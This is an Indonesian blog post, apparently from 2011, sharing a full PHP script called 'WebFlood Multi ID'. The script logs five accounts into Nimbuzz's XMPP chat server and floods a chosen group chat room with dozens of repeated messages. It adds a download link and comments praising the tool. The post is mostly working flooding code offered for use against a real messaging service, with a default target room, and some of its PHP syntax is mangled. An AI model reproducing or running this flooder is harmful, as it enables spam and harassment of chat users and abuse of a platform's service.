WebFlood Multi ID in Room (Part 2)

 laugh Nich dia waaktunya buat posting lagi................... dance dance dance

Kali ini saya akan membangi script mengenai WebFlood Multi ID di Room...........  wink
 Script ini kerjanya agak mirip ma zombie yakni multi ID bedanya pada script ini untuk memasukkan jid mesti manual n jumlah pasukannya 5....... tpi bagi yang ngrti mslh script PHP pasti dah tw kan bagian mana yang mesti di edit biar gag perlu nulis-nulis jid pasukan n pasword...... laugh laugh laugh 
    Owh iya sedikit tambahan sebelum aku bagi scriptnya yakni WebFlood ini sangat jauh kekuatannya di bandingkan aplikasi-aplikasi sekelas zombie... laugh jadi maklum aja kalau banyak orang lebih suka menggunakan aplikasi tersebut........................  wink


Ni lansung aja saya posting acriptnya:

Code:
<?phpinclude 'XMPPHP/Log.php';
include 
'XMPPHP/XMPP.php';

if (!isset(
$_POST["Submit"]))
{

echo 
"<form id='pv1' name='send' method='post' action='$_SERVER[PHP_SELF]'>";
echo 
"<table width='410' border='0' cellspacing='1' cellpadding='1'>";
echo 
"<tr>";
echo 
"<td width='50'>Username1</td>";
echo 
"<td width='10'>:</td>";
echo 
"<td width='350'><input name='username' type='text' id='username'/></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td width='50'>Username2</td>";
echo 
"<td width='10'>:</td>";
echo 
"<td width='350'><input name='username1' type='text' id='username1' /></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td width='50'>Username3</td>";
echo 
"<td width='10'>:</td>";
echo 
"<td width='350'><input name='username2' type='text' id='username2' /></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td width='50'>Username4</td>";
echo 
"<td width='10'>:</td>";
echo 
"<td width='350'><input name='username3' type='text' id='username3' /></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td width='50'>Username5</td>";
echo 
"<td width='10'>:</td>";
echo 
"<td width='350'><input name='username4' type='text' id='username4' /></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td>Password</td>";
echo 
"<td>:</td>";
echo 
"<td><input name='password' type='password' id='password' /></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td>Target</td>";
echo 
"<td>:</td>";
echo 
"<td><input name='target' type='text' id='target' value='Markas_Besar_FMT' /></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td>Text</td>";
echo 
"<td>:</td>";
echo 
"<td><textarea name='text' cols='30' rows='4' id='textplud'></textarea></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td>&nbsp;</td>";
echo 
"<td>&nbsp;</td>";
echo 
"<td><input type='hidden' name='mode' value='enter1' /></td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td>&nbsp;</td>";
echo 
"<td>&nbsp;</td>";
echo 
"<td><input type='submit' name='Submit' value='Submit' /></td>";
echo 
"</tr>";
echo 
"</table>";
echo 
"</form>";
}
else
{
$user$_POST["username"];$user1$_POST["username1"];$user2$_POST["username2"];$user3$_POST["username3"];$user4$_POST["username4"];$password$_POST["password"];$resource='Flooder Manual Team';$host='openfire.nimbuzz.com';$port='5222';$server='nimbuzz.com';$target=$_POST["target"];$to="$target@conference.nimbuzz.com";$body=$_POST["text"];
$conn = new XMPPHP_XMPP($host$port$user$password$resource$server$printlog=false$loglevel=XMPPHP_Log::LEVEL_INFO);$conn1 = new XMPPHP_XMPP($host$port$user1$password$resource$server$printlog=false$loglevel=XMPPHP_Log::LEVEL_INFO);$conn2 = new XMPPHP_XMPP($host$port$user2$password$resource$server$printlog=false$loglevel=XMPPHP_Log::LEVEL_INFO);$conn3 = new XMPPHP_XMPP($host$port$user3$password$resource$server$printlog=false$loglevel=XMPPHP_Log::LEVEL_INFO);$conn4 = new XMPPHP_XMPP($host$port$user4$password$resource$server$printlog=false$loglevel=XMPPHP_Log::LEVEL_INFO);


try {
    
$conn->connect();$conn1->connect();
 
$conn2->connect();$conn3->connect();$conn4->connect();
    
$conn->processUntil('session_start');
 
$conn1->processUntil('session_start');$conn2->processUntil('session_start');
 
$conn3->processUntil('session_start');$conn4->processUntil('session_start'); for ($i=1;$i<=1;$i++){
    
$conn->presence(NULL"bot""$to/$user""available");$conn1->presence(NULL"bot""$to/$user1""available"); $conn->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat"); $conn2->presence(NULL"bot""$to/$user2""available");$conn3->presence(NULL"bot""$to/$user3""available"); $conn3->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat");$conn1->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn4->presence(NULL"bot""$to/$user4""available");$conn4->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn4->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn3->message($to,$body,"groupchat");$conn2->message($to,$body,"groupchat");

}
echo "flood room ke $to, berhasil :D............ reload this page to resend ur flood........ salam Flooder manual Team ;-)";
} catch(
XMPPHP_Exception $e) {
    die(
$e->getMessage());
}
}
?>

jangan lupa scriptnya di simpan dalam Format .PHP........

Owh iya buat yang pengen instant n gag perlu buat2 lagi silahkan download DISINI

buat cara penggunaannya silahkan baca di artikel sebelumnya...........  wink

owh iya terima kasih buat kang eliash yang dah berbagi ilmu mengenai webflood buat room di nimbuzzing.org dan juga sekali lagi special thank dah buat sahabat w yang dah ngajarin tentang WebFlood yakni KID_69
 fire fire thanks all........... keep enjoying with Flood........... excited excited



Nantikan Script-Script Selanjutnya................ semoga smuanya bisa bermanfaat.........





Comments :

3 komentar to “WebFlood Multi ID in Room (Part 2)”

poetry.blogspot.com mengatakan...
on 

waaaaw majuu terusss buat fmt ciayoooooo

zackoverload mengatakan...
on 

Ada award buat flooder manual team ni >>> wajib diambil wkwkwk http://www.nimbuzz-bisnis.com/2010/04/award-you-are-nice-blogger.html

Anonymous mengatakan...
on 

trimakasih om...
gw dah coba...mantap banget....
dewasaya.110mb.com

Posting Komentar

Silahkan Komentar di bawah ini:

Yahoo bot last visit powered by MyPagerank.Net Powered by  MyPagerank.Net Top Blogs Technology
 

Copyright © 2011 by Blog Nimbuzzer

Design by Saddam Jahidin | Powered by Blogger